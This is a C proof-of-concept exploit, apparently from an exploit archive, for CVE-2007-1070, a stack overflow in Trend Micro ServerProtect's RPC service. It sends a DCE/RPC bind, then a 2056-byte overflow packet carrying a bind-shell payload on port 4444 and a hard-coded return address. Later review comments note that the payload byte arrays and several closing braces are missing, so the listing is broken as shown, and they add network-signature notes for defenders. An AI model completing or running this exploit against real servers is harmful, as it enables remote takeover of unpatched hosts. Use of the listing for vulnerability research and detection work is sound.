
Related Vulnerabilities: CVE-2007-1070  
Publish Date: 06 Sep 2007
Author: devcode
 * Copyright (c) 2007 devcode
 *      ^^ D E V C O D E ^^
 * Trend Micro ServerProtect eng50.dll Stack Overflow
 * [CVE-2007-1070]
 * Description:
 *    A boundary error within a function in eng50.dll can be
 *    exploited to cause a stack-based buffer overflow via a
 *    specially crafted RPC request to the SpntSvc.exe service.
 * Hotfix/Patch:
 * Vulnerable systems:
 *    ServerProtect for Windows 5.58
 *    ServerProtect for EMC 5.58
 *    ServerProtect for Network Appliance Filer 5.61
 *    ServerProtect for Network Appliance Filer 5.62
 * Tested on:
 *     Microsoft Windows 2000 SP4
 *    This is a PoC and was created for educational purposes only. The
 *    author is not held responsible if this PoC does not work or is
 *    used for any purpose other than the one stated above.
 * Notes:
 *    <3 TippingPoint for technical details. Had this made few days after
 *    disclosure (few months back), was rlsd on r1918 about a week ago 
 *    and I notice trend micro exploit reports on DIDNT KNOW
#include <iostream>
#include <windows.h>
#pragma comment( lib, "ws2_32.lib" )
/* 25288888-bd5b-11d1-9d53-0080c83a5c2c v1.0 */
/* DCE/RPC bind request for the interface UUID named above.
 * NOTE(review): the byte initializer is absent from this listing (the
 * declaration ends at `=`), so the file does not compile as shown. It is
 * sent with sizeof - 1 below, which suggests it was a string literal. */
unsigned char uszDceBind[] =
/* rpc_opnum_0 */
/* Request header for opnum 0; copied to the start of the 2056-byte
 * packet in main(). Initializer likewise missing from this listing. */
unsigned char uszDceCall[] =
/* win32_bind -  EXITFUNC=thread LPORT=4444 Size=342 Encoder=PexFnstenvMov */
/* Payload bytes; initializer missing from this listing. The "port 4444"
 * message printed by main() refers to the LPORT noted above. */
unsigned char uszShellcode[] =
/* Print the banner and the command-line syntax (target IP and TCP port).
 * NOTE(review): the function's closing brace is missing from this listing. */
void usage( ) {
  printf("\n\t\tTrend Micro ServerProtect Stack Overflow\n"
      "\t\t\t(c) 2007 devcode\n\n"
      "usage: tmicro.exe <ip> <port>\n");
/*
 * Entry point of the PoC client.
 *
 * argv[1] is the target host (dotted IPv4), argv[2] the TCP port. The
 * client connects, sends one DCE/RPC bind (uszDceBind), reads the reply
 * into szRecvBuf without parsing it, then sends a single fixed-size
 * 2056-byte request built from uszDceCall plus a mostly-0x41 body, and
 * exits.
 *
 * Returns 0 after the second send completes; -1 on bad usage or on
 * WSAStartup / socket / connect / send / first recv failure.
 *
 * NOTE(review): every `if` body in this listing, and main() itself, is
 * missing its closing brace, and the three byte arrays above have no
 * initializer, so the file is not compilable as shown.
 *
 * Defender notes: the request to this interface is a fixed 2056 bytes
 * and almost entirely 0x41 filler, which is a straightforward network
 * signature for traffic aimed at the SpntSvc.exe RPC service; the
 * hard-coded address written at offset 1198 ties the PoC to the
 * TmRpcSrv.dll build on the Windows 2000 SP4 system named in the header,
 * so it is not expected to behave the same elsewhere.
 */
int main( int argc, char **argv ) {
  WSADATA wsaData;
  SOCKET sConnect;
  SOCKADDR_IN sockAddr;
  char szRecvBuf[512];            /* bind reply; only the byte count is ever checked */
  unsigned char uszPacket[2056];  /* the whole request, sent in one call */
  int nRet;
  if ( argc < 3 ) {
    usage( );
    return -1;
  /* NOTE(review): no WSACleanup() appears anywhere in this listing. */
  if ( WSAStartup( MAKEWORD( 2, 0 ), &wsaData ) != NO_ERROR ) {
    printf("[-] Unable to startup winsock\n");
    return -1;
  sConnect = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP );
  if ( sConnect == INVALID_SOCKET ) {
    printf("[-] Invalid socket\n");
    return -1;
  sockAddr.sin_family = AF_INET;
  /* Neither result is validated: a malformed host yields INADDR_NONE from
   * inet_addr(), a non-numeric port yields 0 from atoi(). */
  sockAddr.sin_addr.s_addr = inet_addr( argv[1] );  
  sockAddr.sin_port = htons( atoi( argv[2] ) );
  printf("[+] Connecting to %s:%s\n", argv[1], argv[2] );
  nRet = connect( sConnect, (SOCKADDR *)&sockAddr, sizeof( sockAddr ) );
  if ( nRet == SOCKET_ERROR ) {
    printf("[-] Cannot connect to server\n");
    closesocket( sConnect );
    return -1;
  printf("[+] Sending DCE Bind packet...\n");
  /* sizeof - 1 drops the terminating NUL of the array initializer. */
  nRet = send( sConnect, (const char *)uszDceBind, sizeof( uszDceBind ) - 1, 0 );
  if ( nRet  == SOCKET_ERROR ) {
    printf("[-] Cannot send\n");
    closesocket( sConnect );
    return -1;
  /* The bind_ack is not parsed; any positive byte count is accepted. */
  nRet = recv( sConnect, szRecvBuf, sizeof( szRecvBuf ), 0 );
  if ( nRet <= 0 ) {
    printf("[-] Recv failed\n");
    closesocket( sConnect );
    return -1;
  /* Fill the entire packet with 0x41 ('A'), then overlay the pieces. */
  memset( uszPacket, 0x41, sizeof( uszPacket ) );
  /* NOTE(review): full sizeof here, but sizeof - 1 for the other two
   * arrays; if uszDceCall is a string literal too, its NUL is copied. */
  memcpy( uszPacket, (const char *)uszDceCall, sizeof( uszDceCall ) );
  memcpy( uszPacket+48, uszShellcode, sizeof( uszShellcode ) - 1 );
  /* call ebx, 0x6574131C, TmRpcSrv.dll */
  /* jmp ebx, 0x7C4E4A66, kernel32.dll */
  /* Little-endian form of the TmRpcSrv.dll address in the comment above;
   * the kernel32.dll alternative listed there is not used by this code. */
  memcpy( uszPacket + 1198, "\x1C\x13\x74\x65", 4 );
  /* Trailing 8 bytes at offset 2048: two little-endian 0x000007D0 (2000)
   * values; their meaning is not stated in this listing. */
  memcpy( uszPacket + 2048, "\xD0\x07\x00\x00\xD0\x07\x00\x00", 8 );
  printf("[+] Sending DCE Request packet...\n");
  nRet = send( sConnect, (const char *)uszPacket, sizeof( uszPacket ), 0 );
  if ( nRet == SOCKET_ERROR ) {
    printf("[-] Cannot send\n");
    closesocket( sConnect );
    return -1;
  /* 4444 matches the LPORT noted above the uszShellcode declaration. */
  printf("[+] Check shell on port 4444 :)\n");  
  /* Result ignored; presumably only delays the close until the server
   * responds or drops the connection. */
  nRet = recv( sConnect, szRecvBuf, sizeof( szRecvBuf ), 0 );  
  closesocket( sConnect );
  return 0;
